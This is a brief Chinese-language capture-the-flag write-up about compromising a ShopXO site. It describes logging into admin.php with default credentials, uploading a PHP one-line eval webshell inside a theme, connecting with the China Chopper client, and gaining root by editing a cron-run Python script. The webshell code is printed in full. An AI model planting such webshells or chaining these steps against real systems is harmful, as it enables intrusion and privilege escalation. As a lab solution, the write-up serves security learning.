题目给了一个网站的模板
通过扫描进入后台admin.php
默认用户名admin
默认密码搜索得shopxo
在当前主题那里下载默认主题
然后在主题里面传一个一句话木马
<?php
@eval($_POST[a]);
phpinfo();
?>
用菜刀连接(路径可在浏览器查看源码中找到)
打开flag得知真正的flag在/root/flag
但是没有权限打开/root/
于是查看红色的auto.sh
发现每一分钟执行一个py脚本
查看该脚本
发现脚本有root权限
于是修改py脚本 使得脚本读取/root/flag/并将其写入flag.hint
查看flag.hint 得到flag
